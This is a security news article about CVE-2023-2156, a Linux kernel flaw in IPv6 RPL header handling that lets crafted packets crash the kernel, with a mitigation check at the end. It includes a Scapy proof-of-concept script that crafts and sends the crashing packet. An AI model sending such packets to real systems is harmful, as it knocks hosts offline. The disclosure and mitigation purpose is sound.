0-day vulnerability in the Linux IPv6 stack allowing a remote kernel crash

Information has been disclosed about an unpatched (0-day) vulnerability (CVE-2023-2156) in the Linux kernel that allows a system to be halted by sending specially crafted IPv6 packets (packet-of-death). The problem manifests only when support for the RPL protocol (Routing Protocol for Low-Power and Lossy Networks) is enabled. RPL is disabled by default in distributions and is used mainly on embedded devices operating in wireless networks with high packet loss.

The vulnerability is caused by incorrect processing of external data in the RPL protocol parsing code, which leads to an assert failure and the kernel going into a panic state. When the data obtained from parsing the IPv6 RPL packet header is placed into the sk_buff (Socket Buffer) structure, if the CmprI field is set to 15, the Segleft field to 1, and CmprE to 0, the 48-byte vector of addresses is decompressed to 528 bytes, and the memory allocated for the buffer turns out to be insufficient. In this case, the skb_push function, which is used to push data into the structure, detects the mismatch between the size of the data and the buffer and generates a panic state to prevent a write beyond the buffer boundary.
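The arithmetic behind the 48 to 528 byte figure, as an added example (not code from the kernel or from the original page): it applies the RFC 6554 address-count formula to the fixed header fields. The function names, the sample header bytes and the `headroom` parameter are assumptions made for illustration.

```c
#include <stdint.h>
#include <stdio.h>

/* Sizes derived from the fixed 8-byte RPL source routing header (RFC 6554). */
struct rpl_srh_info {
    unsigned cmpri, cmpre, pad, segleft;
    size_t wire_len;  /* address bytes carried in the packet (Hdr Ext Len * 8) */
    size_t n_addrs;   /* number of addresses encoded in those bytes */
    size_t full_len;  /* address bytes once every entry is expanded to 16 */
};

/* Constructed sample: the field values quoted in the text (next header 59). */
static const uint8_t SAMPLE_HDR[8] = { 59, 6, 3, 1, 0xf0, 0x00, 0x00, 0x00 };

/* Returns 0 and fills *o, or -1 if the header is malformed. */
int rpl_srh_sizes(const uint8_t *h, size_t len, struct rpl_srh_info *o)
{
    if (len < 8 || h[2] != 3)            /* routing type 3 = RPL */
        return -1;
    o->segleft = h[3];
    o->cmpri = h[4] >> 4;                /* prefix bytes elided, all but last */
    o->cmpre = h[4] & 0x0f;              /* prefix bytes elided, last address */
    o->pad = h[5] >> 4;
    o->wire_len = (size_t)h[1] * 8;
    size_t each = 16 - o->cmpri, last = 16 - o->cmpre;
    if (o->wire_len < o->pad + last)
        return -1;
    size_t rest = o->wire_len - o->pad - last;
    if (rest % each)                     /* must divide evenly */
        return -1;
    o->n_addrs = rest / each + 1;
    o->full_len = o->n_addrs * 16;
    return o->segleft > o->n_addrs ? -1 : 0;
}

/* Hypothetical pre-check: may the expanded list grow into `headroom` bytes? */
int rpl_srh_fits(const struct rpl_srh_info *i, size_t headroom)
{
    return i->full_len <= i->wire_len + headroom;
}

int main(void)
{
    struct rpl_srh_info i;
    if (rpl_srh_sizes(SAMPLE_HDR, sizeof SAMPLE_HDR, &i) == 0)
        printf("%zu addresses, %zu -> %zu bytes, fits in 64: %d\n",
               i.n_addrs, i.wire_len, i.full_len, rpl_srh_fits(&i, 64));
    return 0;
}
```

With CmprI = 15 every address except the last occupies one byte on the wire, so 48 bytes encode 33 addresses, which expand to 33 × 16 = 528 bytes.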

Exploit example:

```python
# We'll use Scapy to craft the packet
from scapy.all import *
import socket
import sys

# Use the IPv6 address of your LAN interface
DST_ADDR = sys.argv[1]
SRC_ADDR = DST_ADDR

# We use sockets to send the packet
sockfd = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW)

# Craft the packet
#   Type = 3 makes this an RPL packet
#   Addresses contains 3 addresses, but because CmprI is 15,
#   each octet of the first two addresses is treated as a compressed address
#   Segleft = 1 to trigger the amplification
#   lastentry = 0xf0 sets CmprI to 15 and CmprE to 0
p = IPv6(src=SRC_ADDR, dst=DST_ADDR) / IPv6ExtHdrSegmentRouting(type=3, addresses=[…, "a8::", "a7::"], segleft=1, lastentry=0xf0)

# Send this evil packet
sockfd.sendto(bytes(p), (DST_ADDR, 0))
```

It is noteworthy that the kernel developers were notified about the vulnerability back in January 2022 and over the past 15 months tried to fix the problem three times, releasing patches in September 2022, October 2022 and April 2023, but each time the fix was insufficient and the vulnerability could still be reproduced. In the end, the ZDI project, which coordinated the work on fixing the vulnerability, decided to publish detailed information about it without waiting for a working fix to become available in the kernel.

The vulnerability therefore remains unfixed. In particular, the patch included in the 6.4-rc2 kernel is ineffective. Users are advised to check that the RPL protocol is not in use on their systems, which can be done with the command: sysctl -a | grep -i rpl_seg_enabled

Source: opennet.ru
